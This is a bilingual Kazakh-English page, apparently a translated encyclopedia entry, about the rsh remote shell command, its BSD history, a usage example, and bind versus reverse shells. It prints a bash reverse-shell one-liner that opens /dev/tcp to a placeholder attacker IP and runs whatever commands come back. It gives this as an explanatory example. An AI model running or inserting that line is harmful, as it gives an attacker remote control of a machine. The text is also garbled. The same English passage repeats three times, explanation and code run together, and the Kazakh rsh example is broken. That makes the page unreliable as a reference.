Ағылшыншамен салыстырыңыз: абзацты басыңыз — түпнұсқа терезеде ашылады. Абзац астындағы EN түймесі оны мәтін ішінде көрсетеді.
Мазмұны
Кіріспе
Командалық жол бағдарламасы
Command line program
Қашықтан shell (rsh) – компьютер желісі арқылы басқа пайдаланушы ретінде және басқа компьютерде shell командаларын орындай алатын командалық жол компьютерлік бағдарламасы. rsh қосылатын қашықтағы жүйе rsh демонының (rshd) жұмыс істеуін қамтамасыз етеді. Демон әдетте кең таралған Трансмиссиялық бақылау протоколының (TCP) 513 портын пайдаланады.
The remote shell (rsh) is a command line computer program that can execute shell commands as another user, and on another computer across a computer network. The remote system to which rsh connects runs the rsh daemon (rshd). The daemon typically uses the well known Transmission Control Protocol (TCP) port number 513.
Тарих
Rsh 1983 жылы 4.2BSD нұсқасында rlogin пакетінің бір бөлігі ретінде rcp-мен бірге BSD Unix операциялық жүйесінде пайда болды. Содан бері rsh басқа операциялық жүйелерге көшірілді. rsh командасы PWB/UNIX-те алғаш пайда болған, басқа бір таралған UNIX құралы – шектелген қабықшамен бірдей атауға ие; System V Release 4 нұсқасында шектелген қабықша көбінесе /usr/bin/rsh мекенжайында орналасқан. Басқа Беркли r командалары сияқты, rsh протоколы да пайдаланушыны куәландыруды қамтиды және желілік қолдану үшін қауіпсіз емес, себебі ол желі арқылы шифрланбаған ақпаратты жібереді. Кейбір нұсқалары желі арқылы шифрланбаған парольдерді жіберу арқылы куәландыруды жүзеге асырады. Қазіргі кезде rsh бағдарламасы, тіпті жергілікті желілерде де, Secure Shell (ssh) бағдарламасымен ауыстырылды.
Rsh originated as part of the BSD Unix operating system, along with rcp, as part of the rlogin package on 4.2BSD in 1983. rsh has since been ported to other operating systems. The rsh command has the same name as another common UNIX utility, the restricted shell, which first appeared in PWB/UNIX; in System V Release 4, the restricted shell is often located at /usr/bin/rsh. As other Berkeley r commands which involve user authentication, the rsh protocol is not secure for network use, because it sends unencrypted information over the network, among other reasons. Some implementations also authenticate by sending unencrypted passwords over the network. rsh has largely been replaced with the secure shell (ssh) program, even on local networks.
Мысал
rsh пайдалану мысалы ретінде, төмендегі команда хост компьютеріндегі remoteuser пайдаланушысы ретінде mkdir testdir командасын орындайды. мысал.com Unix-тәрізді жүйеде жұмыс істейді:
As an example of rsh use, the following executes the command mkdir testdir as user remoteuser on the computer host. example. com running a UNIX like system:
$ rsh remoteuser host.мысал.com "mkdir testdir"
$ rsh l remoteuser host. example. com "mkdir testdir"
Команда аяқталғаннан кейін rsh жұмысын тоқтатады. Егер команда көрсетілмесе, rsh rlogin арқылы қашық жүйеге кіреді. Қашық компьютердің желідегі орны Домендік атаулар жүйесі арқылы анықталады.
After the command has finished rsh terminates. If no command is specified then rsh will log in on the remote system using rlogin. The network location of the remote computer is looked up using the Domain Name System.
Байлау қабығы және кері қабығы
Қашықтан шель сессиясын жергілікті құрылғы (бұйрықтарды жібереді) немесе қашықтан құрылғы (бұйрықтарды орындайды) бастауы мүмкін. Бірінші жағдайда қашықтан басқару қабығы "байлау қабығы" деп, екінші жағдайда "кері қабық" деп аталады. Кері қабық, команда орындалатын құрылғы тікелей қолжетімді болмаған кезде қолданылады, мысалы, NAT-тің артында орналасқан және сырттан қолжетімді емес компьютерлерді қашықтан техникалық қызмет көрсету үшін. Кейбір зиянды бағдарламалар шабуылға ұшыраған құрылғыдан шабуылдаушылар басқаратын машиналарға кері қабық жасайды (бұл "кері қабық шабуылы" деп аталады). Төмендегі код кері қабық шабуылының мысалын көрсетеді:
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed). In the first case remote shell will be called bind shell, in the second case reverse shell. Reverse shell can be used when the device on which the command is to be executed is not directly accessible for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:
$ exec 5<>/dev/tcp/<attacker IP>/80;cat <&5 | while read line; do \$line 2>&5 >&5; doneIt opens a TCP socket to attacker IP at port 80 as a file descriptor. It then repeatedly read lines from the socket and run the line, piping both stdout and stderr back to the socket. In other words, it gives the attacker a remote shell on the machine.
$ exec 5<>/dev/tcp/<attacker IP>/80; cat <&5 | while read line; do $line 2>&5 >&5; done
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed). In the first case remote shell will be called bind shell, in the second case reverse shell. Reverse shell can be used when the device on which the command is to be executed is not directly accessible for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:
$ exec 5<>/dev/tcp/<attacker IP>/80;cat <&5 | while read line; do \$line 2>&5 >&5; doneIt opens a TCP socket to attacker IP at port 80 as a file descriptor. It then repeatedly read lines from the socket and run the line, piping both stdout and stderr back to the socket. In other words, it gives the attacker a remote shell on the machine.
Бұл команда файл дескрипторы ретінде 80-ші портта шабуылдаушының IP-адресіне TCP сокетін ашады. Содан кейін ол сокеттен жолдарды оқып, оларды орындайды, соның ішінде стандартты шығыс ағыны мен қателік ағынын кері сокетке жібереді. Яғни, ол шабуылдаушыға машинаның қашықтан басқару құралын ұсынады.
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed). In the first case remote shell will be called bind shell, in the second case reverse shell. Reverse shell can be used when the device on which the command is to be executed is not directly accessible for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:
$ exec 5<>/dev/tcp/<attacker IP>/80;cat <&5 | while read line; do \$line 2>&5 >&5; doneIt opens a TCP socket to attacker IP at port 80 as a file descriptor. It then repeatedly read lines from the socket and run the line, piping both stdout and stderr back to the socket. In other words, it gives the attacker a remote shell on the machine.